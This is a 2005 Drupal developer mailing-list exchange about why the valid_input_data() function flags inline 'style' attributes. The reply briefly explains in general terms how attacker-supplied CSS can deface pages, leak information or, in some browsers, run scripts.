[drupal-devel] Question on valid_input_data()
puregin
puregin at puregin.org
Sun May 8 07:53:45 UTC 2005
On 7 May 2005, at 8:13 PM, K B wrote:
> In 4.6 includes/common.inc, in the function valid_input_data(), there
> is a check for various entities. Among these entities, there is a
> check for "style".
>
> http://drupaldocs.org/api/4.6/function/valid_input_data
>
> I use the banner module with text ads, and I use things like:
>
> <div style="some-style-definitions">some text</div>
>
> This check causes the above to be flagged as a security breach attempt
> and is logged to the watchdog as such.
>
> http://drupal.org/node/20608#comment-29106
>
> My question is: Can the "style" element be used in malicious attacks?
> If yes, then how?
>
Hi K B, yes, the style element can be used in attacks. If an
attacker can
place CSS on your page, arbitrary elements can be moved, or hidden;
images can be replaced, or tiled to completely render the page
useless; images can be used in information leak attempts and
some browsers extend CSS to allow the execution of scripts.
A little Google search for "style element css attack" should yield more
details.
Regards, Djun
> Thanks in advance.
>
More information about the drupal-devel
mailing list